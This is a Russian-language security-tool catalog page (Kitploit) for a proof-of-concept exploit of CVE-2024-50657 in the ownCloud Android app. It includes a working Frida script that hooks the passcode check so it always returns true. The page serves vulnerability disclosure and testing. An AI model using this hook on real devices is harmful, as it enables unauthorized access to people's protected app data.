Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50657 — Предоставляет proof-of-concept эксплойт для CVE-2024-50657 — уязвимости некорректного контроля доступа в Android-приложении Owncloud, демонстрирующий обход кода доступа с помощью перехвата через Frida. | Kitploit
Инструменты/GitHubGitHub/sahalll/cve-2024-50657
Безопасность AndroidАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеМобильная безопасность
GitHubsahalll/cve-2024-50657

CVE-2024-50657

Предоставляет proof-of-concept эксплойт для CVE-2024-50657 — уязвимости некорректного контроля доступа в Android-приложении Owncloud, демонстрирующий обход кода доступа с помощью перехвата через Frida.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-50657: Неправильный контроль доступа в Owncloud APK

Проблема в Owncloud Android APK версии 4.4.1 позволяет физически близкому злоумышленнику повышать привилегии через класс PassCodeViewModel, а именно через метод checkPassCodeIsValid.

Тип уязвимости

Неправильный контроль доступа

Производитель продукта

Owncloud

Затронутая кодовая база продукта

Owncloud Android APK - 4.4.1

Затронутый компонент

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

Эксплуатация

Определение целевого класса и метода:

Класс PassCodeViewModel в приложении управляет логикой проверки кода доступа. Метод checkPassCodeIsValid внутри этого класса отвечает за определение валидности введенного кода доступа.

Перехват метода с помощью Frida:

Сценарий Frida используется для перехвата метода checkPassCodeIsValid в классе PassCodeViewModel. Реализация метода изменяется так, чтобы всегда возвращать true, обходя фактическую проверку кода доступа.

Выполнение:

Сценарий Frida выполняется, пока приложение запущено. Любой введенный пользователем код доступа будет принят как валидный, что позволяет получить несанкционированный доступ.

PoC

Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true return true;

};

});

Ссылка на видео PoC: https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

Воздействие:-

Эта уязвимость является клиентской уязвимостью обхода безопасности. Она затрагивает пользователей приложения, которые полагаются на функцию кода доступа для защиты конфиденциальных данных или ограничения доступа к определенным функциям приложения. Используя эту уязвимость, злоумышленник может обойти проверку кода доступа и получить несанкционированный доступ к областям приложения, которые должны быть защищены, что потенциально может привести к раскрытию пользовательских данных или разрешению несанкционированных действий в приложении.

Скачать инструмент